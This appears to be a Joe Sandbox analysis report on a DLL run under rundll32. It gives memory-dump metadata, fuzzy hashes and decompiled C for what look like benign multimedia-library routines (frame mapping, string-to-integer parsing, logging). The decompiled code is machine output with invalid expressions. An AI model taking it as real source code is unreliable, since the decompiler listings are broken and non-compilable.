                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: memcmpstrlen
                                                                      • String ID: mono
                                                                      • API String ID: 3108337309-2381334079
                                                                      • Opcode ID: 961e4d7430c6ee58c8d49aecf6a6276b133ce91f2d562b03286109f610fa6c8a
                                                                      • Instruction ID: 18b6b574f71558c9a9b0b92199a84ecc10b2be927aad7e864a8dbdfaab720d03
                                                                      • Opcode Fuzzy Hash: 961e4d7430c6ee58c8d49aecf6a6276b133ce91f2d562b03286109f610fa6c8a
                                                                      • Instruction Fuzzy Hash: 62713A74A083598FD354DF25C48491EBBE2FFC8384F51892DE88997319DB34E9458F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mallocz$mv_realloc$mv_freep
                                                                      • String ID:
                                                                      • API String ID: 3944475926-0
                                                                      • Opcode ID: a6fa4d2bae3b4a2bda0a35254eb544c858f4501f780d02fc74c31e633d2e6906
                                                                      • Instruction ID: 0671ab7339bb216cd2d01b0f004d479de4b058bf66c6df6044412f8339b3df2e
                                                                      • Opcode Fuzzy Hash: a6fa4d2bae3b4a2bda0a35254eb544c858f4501f780d02fc74c31e633d2e6906
                                                                      • Instruction Fuzzy Hash: 937104B48087018FE714DF25C18471AFBE0FF86380F568A6DE9898B365D775E980CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 45%
                                                                      			E1001E690(intOrPtr _a4, char _a8) {
                                                                      				char _v16;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v48;
                                                                      				char* _v52;
                                                                      				char _v56;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				intOrPtr _t37;
                                                                      				intOrPtr _t38;
                                                                      				intOrPtr _t39;
                                                                      				intOrPtr _t42;
                                                                      				intOrPtr _t45;
                                                                      				char _t46;
                                                                      				intOrPtr _t49;
                                                                      				char _t58;
                                                                      				intOrPtr* _t63;
                                                                      				intOrPtr _t64;
                                                                      				intOrPtr _t70;
                                                                      				intOrPtr _t71;
                                                                      				void* _t72;
                                                                      				intOrPtr* _t73;
                                                                      
                                                                      				_t73 = _t72 - 0x34;
                                                                      				_t37 = _a4;
                                                                      				_t58 = _a8;
                                                                      				_t71 =  *((intOrPtr*)(_t37 + 4));
                                                                      				_t63 =  *((intOrPtr*)(_t71 + 4));
                                                                      				_t61 =  *((intOrPtr*)(_t63 + 0xc));
                                                                      				if( *((intOrPtr*)(_t63 + 0xc)) == 0) {
                                                                      					_t64 =  *_t63;
                                                                      					_t62 =  *((intOrPtr*)(_t64 + 0x3c));
                                                                      					if( *((intOrPtr*)(_t64 + 0x3c)) == 0) {
                                                                      						_t38 = 0xffffffd8;
                                                                      						goto L7;
                                                                      					} else {
                                                                      						if( *((intOrPtr*)(_t71 + 0x1c)) == 0) {
                                                                      							_t38 = 0xffffffea;
                                                                      							goto L7;
                                                                      						} else {
                                                                      							 *_t73 = _t37;
                                                                      							_t39 = L10009FC0(_t58, _t62);
                                                                      							 *((intOrPtr*)(_t58 + 0x128)) = _t39;
                                                                      							if(_t39 == 0) {
                                                                      								goto L6;
                                                                      							} else {
                                                                      								_v56 = _t58;
                                                                      								 *_t73 = _t71;
                                                                      								_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)))) + 0x3c))();
                                                                      								if(_t42 < 0) {
                                                                      									_v32 = _t42;
                                                                      									 *_t73 = _t58 + 0x128;
                                                                      									E1000A000(_t58 + 0x128, _t71);
                                                                      									_t38 = _v32;
                                                                      									goto L7;
                                                                      								} else {
                                                                      									 *((intOrPtr*)(_t58 + 0x40)) = _t58;
                                                                      									return 0;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					 *((intOrPtr*)(_t58 + 0x50)) =  *((intOrPtr*)(_t71 + 0x24));
                                                                      					 *_t73 = _t37;
                                                                      					_t45 = L10009FC0(_t58, _t61);
                                                                      					 *((intOrPtr*)(_t58 + 0x128)) = _t45;
                                                                      					if(_t45 == 0) {
                                                                      						L6:
                                                                      						_t38 = 0xfffffff4;
                                                                      						goto L7;
                                                                      					} else {
                                                                      						_t46 = L1001AC40(_t58, _t70, _t71);
                                                                      						_v16 = _t46;
                                                                      						if(_t46 == 0) {
                                                                      							goto L6;
                                                                      						} else {
                                                                      							_v56 = _t46;
                                                                      							_v52 = 0;
                                                                      							 *_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0xc));
                                                                      							_t49 = E1001E690();
                                                                      							if(_t49 < 0) {
                                                                      								L13:
                                                                      								_v32 = _t49;
                                                                      								 *_t73 =  &_v16;
                                                                      								L1001ADB0(_t58);
                                                                      								return _v32;
                                                                      							} else {
                                                                      								 *_t73 = _t58;
                                                                      								_v52 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0x10));
                                                                      								_v56 = _v16;
                                                                      								_t49 = E1001E450(_t58, _t70, _t71);
                                                                      								if(_t49 == 0) {
                                                                      									goto L13;
                                                                      								} else {
                                                                      									_v48 = _t49;
                                                                      									_v32 = _t49;
                                                                      									_v56 = 0x10;
                                                                      									_v52 = "Failed to map frame into derived frame context: %d.\n";
                                                                      									 *_t73 = _t71;
                                                                      									E10026560();
                                                                      									 *_t73 =  &_v16;
                                                                      									L1001ADB0("Failed to map frame into derived frame context: %d.\n");
                                                                      									_t38 = _v32;
                                                                      									L7:
                                                                      									return _t38;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}
























                                                                      0x1001e736
                                                                      0x1001e73f
                                                                      0x1001e742
                                                                      0x1001e747
                                                                      0x1001e755
                                                                      0x1001e75a
                                                                      0x1001e75a
                                                                      0x1001e713
                                                                      0x1001e6f1
                                                                      0x1001e6d5
                                                                      0x1001e6c4

                                                                      APIs
                                                                      • mv_frame_alloc.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6CA
                                                                        • Part of subcall function 1001AC40: mv_malloc.F086 ref: 1001AC56
                                                                      • mv_hwframe_get_buffer.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6EA
                                                                        • Part of subcall function 1001E690: mv_hwframe_map.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E70C
                                                                        • Part of subcall function 1001E690: mv_log.F086 ref: 1001E736
                                                                        • Part of subcall function 1001E690: mv_frame_free.F086 ref: 1001E742
                                                                      • mv_buffer_ref.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6B7
                                                                        • Part of subcall function 10009FC0: mv_mallocz.F086 ref: 10009FD2
                                                                      • mv_buffer_ref.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E773
                                                                      Strings
                                                                      • Failed to map frame into derived frame context: %d., xrefs: 1001E71D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_ref$mv_frame_allocmv_frame_freemv_hwframe_get_buffermv_hwframe_mapmv_logmv_mallocmv_mallocz
                                                                      • String ID: Failed to map frame into derived frame context: %d.
                                                                      • API String ID: 2770197599-2491951210
                                                                      • Opcode ID: 9c42f20b11d269895efbb2d602614c3a18f3d43235624fe558127838406e54b0
                                                                      • Instruction ID: c8a7df340d6dcafb776f8cd3ae8b96b8e9686aa7a819e798d3a2729e9b2e2ff4
                                                                      • Opcode Fuzzy Hash: 9c42f20b11d269895efbb2d602614c3a18f3d43235624fe558127838406e54b0
                                                                      • Instruction Fuzzy Hash: 6541E5786097418FE740DF29D58095FBBE0FF88350F05896DE8998B355E734E8818B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strcmp$mv_d2qmv_expr_parse_and_evalmv_parse_ratio
                                                                      • String ID: ntsc
                                                                      • API String ID: 2874497773-2045543799
                                                                      • Opcode ID: ec32bec2af6a2ecb4ce6168838176d8fdb98f1596f88ccec490d531f44d5e481
                                                                      • Instruction ID: a2e0eae1ca3038ae62bde4675692c4f594c3c7e77de8ac1c76987ebdc5f5f10b
                                                                      • Opcode Fuzzy Hash: ec32bec2af6a2ecb4ce6168838176d8fdb98f1596f88ccec490d531f44d5e481
                                                                      • Instruction Fuzzy Hash: 9A317E74A09341DFD351DF6AC54029FB6F4EF48781F41882EB989CB650E7B8EA80DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E10092440() {
                                                                      				signed int _t63;
                                                                      				signed int _t64;
                                                                      				signed int _t65;
                                                                      				signed int _t66;
                                                                      				signed int _t68;
                                                                      				signed int _t69;
                                                                      				signed int _t71;
                                                                      				signed int _t84;
                                                                      				signed int _t87;
                                                                      				signed int _t88;
                                                                      				signed int _t89;
                                                                      				void* _t90;
                                                                      				signed int _t91;
                                                                      				void* _t97;
                                                                      				signed int _t120;
                                                                      				signed int _t121;
                                                                      				signed int _t122;
                                                                      				signed int _t125;
                                                                      				signed int _t126;
                                                                      				signed int _t128;
                                                                      				char* _t129;
                                                                      				void* _t131;
                                                                      				signed int* _t132;
                                                                      
                                                                      				_t132 = _t131 - 0x3c;
                                                                      				_t125 = _t132[0x14];
                                                                      				if(_t132[0x15] != 0) {
                                                                      					_t63 = _t132[0x15];
                                                                      					 *_t63 = _t125;
                                                                      				}
                                                                      				if(_t132[0x16] == 1) {
                                                                      					L29:
                                                                      					L100A0678();
                                                                      					 *_t63 = 0x21;
                                                                      					goto L30;
                                                                      				} else {
                                                                      					if(_t132[0x16] <= 0x24) {
                                                                      						while(1) {
                                                                      							_t65 =  *_t125;
                                                                      							 *_t132 = _t65;
                                                                      							_t87 = _t65;
                                                                      							L100A0738();
                                                                      							if(_t65 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t125 = _t125 + 1;
                                                                      						}
                                                                      						_t120 = _t87;
                                                                      						_t88 = _t65;
                                                                      						_t6 = _t120 - 0x2b; // -43
                                                                      						_t66 = _t120;
                                                                      						if((_t6 & 0x000000fd) == 0) {
                                                                      							_t66 =  *(_t125 + 1) & 0x000000ff;
                                                                      							_t125 = _t125 + 1;
                                                                      						}
                                                                      						if(_t132[0x16] != 0) {
                                                                      							if(_t132[0x16] != 0x10 || _t66 != 0x30) {
                                                                      								goto L11;
                                                                      							} else {
                                                                      								if(( *(_t125 + 1) & 0xdf) == 0x58) {
                                                                      									goto L34;
                                                                      								} else {
                                                                      									_t132[9] = 0x10;
                                                                      									_t129 = _t125 + 1;
                                                                      									_t68 = 0;
                                                                      									goto L16;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t132[0x16] = 0xa;
                                                                      							if(_t66 == 0x30) {
                                                                      								if(( *(_t125 + 1) & 0xdf) != 0x58) {
                                                                      									_t132[9] = 8;
                                                                      									_t132[0x16] = 8;
                                                                      									goto L45;
                                                                      								} else {
                                                                      									L34:
                                                                      									_t66 =  *(_t125 + 2) & 0x000000ff;
                                                                      									_t132[0x16] = 0x10;
                                                                      									_t125 = _t125 + 2;
                                                                      									goto L11;
                                                                      								}
                                                                      							} else {
                                                                      								L11:
                                                                      								_t128 = _t66;
                                                                      								if(_t128 - 0x30 <= 9) {
                                                                      									_t132[9] = _t132[0x16];
                                                                      									L45:
                                                                      									_t68 = _t66 - 0x30;
                                                                      									goto L15;
                                                                      								} else {
                                                                      									 *_t132 = _t128;
                                                                      									L100A0740();
                                                                      									if(_t66 != 0) {
                                                                      										_t68 = _t128 - 0x37;
                                                                      										_t132[9] = _t132[0x16];
                                                                      										goto L15;
                                                                      									} else {
                                                                      										 *_t132 = _t128;
                                                                      										L100A0730();
                                                                      										if(_t66 == 0) {
                                                                      											L30:
                                                                      											_t64 = 0;
                                                                      											goto L31;
                                                                      										} else {
                                                                      											_t68 = _t128 - 0x57;
                                                                      											_t132[9] = _t132[0x16];
                                                                      											L15:
                                                                      											_t129 = _t125 + 1;
                                                                      											if(_t68 >= _t132[9]) {
                                                                      												goto L30;
                                                                      											} else {
                                                                      												L16:
                                                                      												_t69 = _t132[0x16];
                                                                      												_t132[0xa] = _t88;
                                                                      												_t126 = _t68;
                                                                      												_t132[6] = _t69;
                                                                      												_t132[7] = _t69 >> 0x1f;
                                                                      												_t71 = _t120;
                                                                      												_t121 = _t68 >> 0x1f;
                                                                      												_t132[0xb] = _t71;
                                                                      												while(1) {
                                                                      													_t89 =  *_t129;
                                                                      													_t35 = _t89 - 0x30; // -96
                                                                      													_t97 = _t35;
                                                                      													if(_t97 <= 9) {
                                                                      														goto L17;
                                                                      													}
                                                                      													 *_t132 = _t89;
                                                                      													L100A0740();
                                                                      													if(_t71 == 0) {
                                                                      														 *_t132 = _t89;
                                                                      														L100A0730();
                                                                      														if(_t71 != 0) {
                                                                      															_t90 = _t89 - 0x57;
                                                                      															goto L18;
                                                                      														}
                                                                      													} else {
                                                                      														_t90 = _t89 - 0x37;
                                                                      														L18:
                                                                      														if(_t90 < _t132[9]) {
                                                                      															 *_t132 = 0xffffffff;
                                                                      															_t132[1] = 0x7fffffff;
                                                                      															_t132[2] = _t132[6];
                                                                      															_t132[3] = _t132[7];
                                                                      															_t71 = L10091900() + 2;
                                                                      															asm("adc edx, 0x0");
                                                                      															asm("sbb edx, edi");
                                                                      															if(_t71 < _t126) {
                                                                      																_t132[0xa] = 1;
                                                                      															} else {
                                                                      																_t84 = _t126;
                                                                      																_t71 = _t84 * _t132[0x16];
                                                                      																_t121 = (_t84 * _t132[0x16] >> 0x20) + _t132[7] * _t126 + _t132[0x16] * _t121;
                                                                      																_t126 = _t71 + _t90;
                                                                      																asm("adc edi, ebx");
                                                                      															}
                                                                      															_t129 = _t129 + 1;
                                                                      															continue;
                                                                      														}
                                                                      													}
                                                                      													_t91 = _t132[0xa];
                                                                      													_t132[7] = _t121;
                                                                      													_t132[6] = _t126;
                                                                      													_t122 = _t132[0xb] & 0x000000ff;
                                                                      													if(_t132[0x15] != 0) {
                                                                      														 *(_t132[0x15]) = _t129;
                                                                      													}
                                                                      													if(_t122 == 0x2d) {
                                                                      														asm("sbb eax, ebp");
                                                                      														if(0 < _t132[6] || _t91 != 0) {
                                                                      															L100A0678();
                                                                      															 *0x80000000 = 0x22;
                                                                      															_t64 = 0;
                                                                      														} else {
                                                                      															_t64 =  ~(_t132[6]);
                                                                      															asm("adc edx, 0x0");
                                                                      														}
                                                                      														goto L31;
                                                                      													} else {
                                                                      														_t64 = _t132[6];
                                                                      														if(_t132[7] < 0 || _t91 != 0) {
                                                                      															L100A0678();
                                                                      															 *_t64 = 0x22;
                                                                      															return 0xffffffff;
                                                                      														} else {
                                                                      															L31:
                                                                      															return _t64;
                                                                      														}
                                                                      													}
                                                                      													goto L51;
                                                                      													L17:
                                                                      													_t90 = _t97;
                                                                      													goto L18;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						goto L29;
                                                                      					}
                                                                      				}
                                                                      				L51:
                                                                      			}



























                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: isupper$_errnoislowerisspace
                                                                      • String ID: $
                                                                      • API String ID: 4095548146-3993045852
                                                                      • Opcode ID: 86157aabf5dcf11647465d89481f5db1467bac492865d6203d8e1a1173ce975d
                                                                      • Instruction ID: bf1127f437a700fe79d2786272533d695bbcf864f17e232e7603132a75f37682
                                                                      • Opcode Fuzzy Hash: 86157aabf5dcf11647465d89481f5db1467bac492865d6203d8e1a1173ce975d
                                                                      • Instruction Fuzzy Hash: A171A0746087868FC300CF68C88065EFBE2EFC9394F15492DF8998B791E674D845AB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E10026169(void* __edi, signed char* __ebp, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a36, intOrPtr _a40, intOrPtr _a44, char _a48, signed char* _a1072, signed char* _a2096, signed char* _a3120, signed char* _a4144, intOrPtr _a4148, intOrPtr _a4152, signed int _a5204, char* _a5208, char* _a5212) {
                                                                      				signed int _t63;
                                                                      				signed int _t67;
                                                                      				signed int _t70;
                                                                      				signed int _t73;
                                                                      				signed int _t76;
                                                                      				signed int _t81;
                                                                      				void* _t84;
                                                                      				signed char* _t85;
                                                                      				int _t87;
                                                                      				signed char* _t88;
                                                                      				intOrPtr _t92;
                                                                      				signed char* _t93;
                                                                      				char* _t102;
                                                                      				signed char* _t103;
                                                                      				signed char* _t104;
                                                                      				signed char* _t105;
                                                                      				signed char* _t106;
                                                                      				char* _t107;
                                                                      				char* _t122;
                                                                      				signed int _t123;
                                                                      				char* _t125;
                                                                      				signed char* _t130;
                                                                      				signed char** _t132;
                                                                      
                                                                      				_t130 = __ebp;
                                                                      				if(( *0x100d76ac & 0x00000002) != 0) {
                                                                      					_t51 = _a5204 + 8; // 0x101
                                                                      					__edx = _t51;
                                                                      					__eax = 0x100b6d3b;
                                                                      					if(__edx <= 0x40) {
                                                                      						__eax =  *((intOrPtr*)(0x100b6f40 + __edx * 4));
                                                                      					}
                                                                      					_a8 = __eax;
                                                                      					__eax = "[%s] ";
                                                                      					_a4 = "[%s] ";
                                                                      					 *__esp = __edi;
                                                                      					__eax = L100089C0();
                                                                      				}
                                                                      				 *_t132 = _t130;
                                                                      				_a8 = _a5212;
                                                                      				_a4 = _a5208;
                                                                      				L10008B70();
                                                                      				_t107 = _a1072;
                                                                      				_t102 = _a2096;
                                                                      				_t122 = _a3120;
                                                                      				_t125 = _a4144;
                                                                      				if( *_t107 != 0 ||  *_t102 != 0 ||  *_t122 != 0 ||  *_t125 != 0) {
                                                                      					_t92 = _a4148;
                                                                      					_t63 = 0;
                                                                      					if(_t92 != 0 && _a4152 >= _t92) {
                                                                      						_t63 = (0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000a |  *(_t125 + _t92 - 1) & 0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000d) & 0x000000ff;
                                                                      					}
                                                                      					 *0x100ad00c = _t63;
                                                                      				}
                                                                      				_a24 = _t125;
                                                                      				_t93 =  &_a48;
                                                                      				_a8 = "%s%s%s%s";
                                                                      				_a20 = _t122;
                                                                      				_a16 = _t102;
                                                                      				_a12 = _t107;
                                                                      				_a4 = 0x400;
                                                                      				 *_t132 = _t93;
                                                                      				L10025AE0();
                                                                      				_t67 =  *0x100d76a0;
                                                                      				if(_t67 == 0) {
                                                                      					 *_t132 = 2;
                                                                      					L100A0860();
                                                                      					asm("sbb eax, eax");
                                                                      					 *0x100d76a0 = _t67 | 0x00000001;
                                                                      				}
                                                                      				_t123 =  *0x100ad00c; // 0x1
                                                                      				_t126 =  *0x100d7280;
                                                                      				if(_t123 == 0 || ( *0x100d76ac & 0x00000001) == 0) {
                                                                      					L12:
                                                                      					if(_t126 > 0) {
                                                                      						 *_t132 = 2;
                                                                      						_t123 = 0;
                                                                      						_t85 =  *0x100ad0cc();
                                                                      						_a8 = _t126;
                                                                      						_t126 = "    Last message repeated %d times\n";
                                                                      						_a4 = "    Last message repeated %d times\n";
                                                                      						 *_t132 = _t85;
                                                                      						E10025610();
                                                                      						 *0x100d7280 = 0;
                                                                      					}
                                                                      					_a4 = _t93;
                                                                      					 *_t132 = 0x100d72a0;
                                                                      					strcpy(??, ??);
                                                                      					_t103 = _a1072;
                                                                      					_t70 =  *_t103 & 0x000000ff;
                                                                      					if(_t70 == 0) {
                                                                      						L20:
                                                                      						L100257B0(_a40, _t93, _t103, 0, _t123, _t126);
                                                                      						_t104 = _a2096;
                                                                      						_t73 =  *_t104 & 0x000000ff;
                                                                      						if(_t73 == 0) {
                                                                      							L26:
                                                                      							L100257B0(_a44, _t93, _t104, 0, _t123, _t126);
                                                                      							_t105 = _a3120;
                                                                      							_t76 =  *_t105 & 0x000000ff;
                                                                      							if(_t76 == 0) {
                                                                      								L32:
                                                                      								_t128 = _a36 >> 8;
                                                                      								_t96 =  >  ? 7 : _a5204 >> 3;
                                                                      								_t97 =  <  ? 0 :  >  ? 7 : _a5204 >> 3;
                                                                      								L100257B0( <  ? 0 :  >  ? 7 : _a5204 >> 3,  <  ? 0 :  >  ? 7 : _a5204 >> 3, _t105, _a36 >> 8, _t123, _a36 >> 8);
                                                                      								_t106 = _a4144;
                                                                      								_t81 =  *_t106 & 0x000000ff;
                                                                      								if(_t81 == 0) {
                                                                      									L38:
                                                                      									L100257B0(_t97, _t97, _t106, _t128, _t123, _t128);
                                                                      									goto L39;
                                                                      								}
                                                                      								L34:
                                                                      								while(_t81 - 0xe > 0x11 && _t81 > 7) {
                                                                      									_t81 = _t106[1] & 0x000000ff;
                                                                      									_t106 =  &(_t106[1]);
                                                                      									if(_t81 != 0) {
                                                                      										continue;
                                                                      									}
                                                                      									L37:
                                                                      									_t106 = _a4144;
                                                                      									goto L38;
                                                                      								}
                                                                      								 *_t106 = 0x3f;
                                                                      								_t106 =  &(_t106[1]);
                                                                      								_t81 =  *_t106 & 0x000000ff;
                                                                      								if(_t81 != 0) {
                                                                      									goto L34;
                                                                      								}
                                                                      								goto L37;
                                                                      							}
                                                                      							L28:
                                                                      							while(_t76 - 0xe > 0x11 && _t76 > 7) {
                                                                      								_t76 = _t105[1] & 0x000000ff;
                                                                      								_t105 =  &(_t105[1]);
                                                                      								if(_t76 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      								L31:
                                                                      								_t105 = _a3120;
                                                                      								goto L32;
                                                                      							}
                                                                      							 *_t105 = 0x3f;
                                                                      							_t105 =  &(_t105[1]);
                                                                      							_t76 =  *_t105 & 0x000000ff;
                                                                      							if(_t76 != 0) {
                                                                      								goto L28;
                                                                      							}
                                                                      							goto L31;
                                                                      						}
                                                                      						L22:
                                                                      						while(_t73 - 0xe > 0x11 && _t73 > 7) {
                                                                      							_t73 = _t104[1] & 0x000000ff;
                                                                      							_t104 =  &(_t104[1]);
                                                                      							if(_t73 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							L25:
                                                                      							_t104 = _a2096;
                                                                      							goto L26;
                                                                      						}
                                                                      						 *_t104 = 0x3f;
                                                                      						_t104 =  &(_t104[1]);
                                                                      						_t73 =  *_t104 & 0x000000ff;
                                                                      						if(_t73 != 0) {
                                                                      							goto L22;
                                                                      						}
                                                                      						goto L25;
                                                                      					} else {
                                                                      						L16:
                                                                      						while(_t70 - 0xe > 0x11 && _t70 > 7) {
                                                                      							_t70 = _t103[1] & 0x000000ff;
                                                                      							_t103 =  &(_t103[1]);
                                                                      							if(_t70 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							L19:
                                                                      							_t103 = _a1072;
                                                                      							goto L20;
                                                                      						}
                                                                      						 *_t103 = 0x3f;
                                                                      						_t103 =  &(_t103[1]);
                                                                      						_t70 =  *_t103 & 0x000000ff;
                                                                      						if(_t70 != 0) {
                                                                      							goto L16;
                                                                      						}
                                                                      						goto L19;
                                                                      					}
                                                                      				} else {
                                                                      					 *_t132 = _t93;
                                                                      					_t106 = 0x100d72a0;
                                                                      					_a4 = 0x100d72a0;
                                                                      					_t87 = strcmp(??, ??);
                                                                      					if(_t87 != 0) {
                                                                      						goto L12;
                                                                      					}
                                                                      					if(_a48 != 0) {
                                                                      						 *_t132 = _t93;
                                                                      						L100A07D8();
                                                                      						if( *((char*)(_t132 + _t87 + 0x2f)) == 0xd) {
                                                                      							goto L12;
                                                                      						}
                                                                      						_t128 =  &(_t126[1]);
                                                                      						 *0x100d7280 = _t128;
                                                                      						if( *0x100d76a0 == 1) {
                                                                      							 *_t132 = 2;
                                                                      							_t88 =  *0x100ad0cc();
                                                                      							_a8 = _t128;
                                                                      							_a4 = "    Last message repeated %d times\r";
                                                                      							 *_t132 = _t88;
                                                                      							E10025610();
                                                                      						}
                                                                      						L39:
                                                                      						 *_t132 = _t130;
                                                                      						_a4 = 0;
                                                                      						_t84 = E10009690(0, _t106, _t123, _t128);
                                                                      						 *_t132 = 0x100d76b0;
                                                                      						L100A0978();
                                                                      						return _t84;
                                                                      					}
                                                                      					goto L12;
                                                                      				}
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
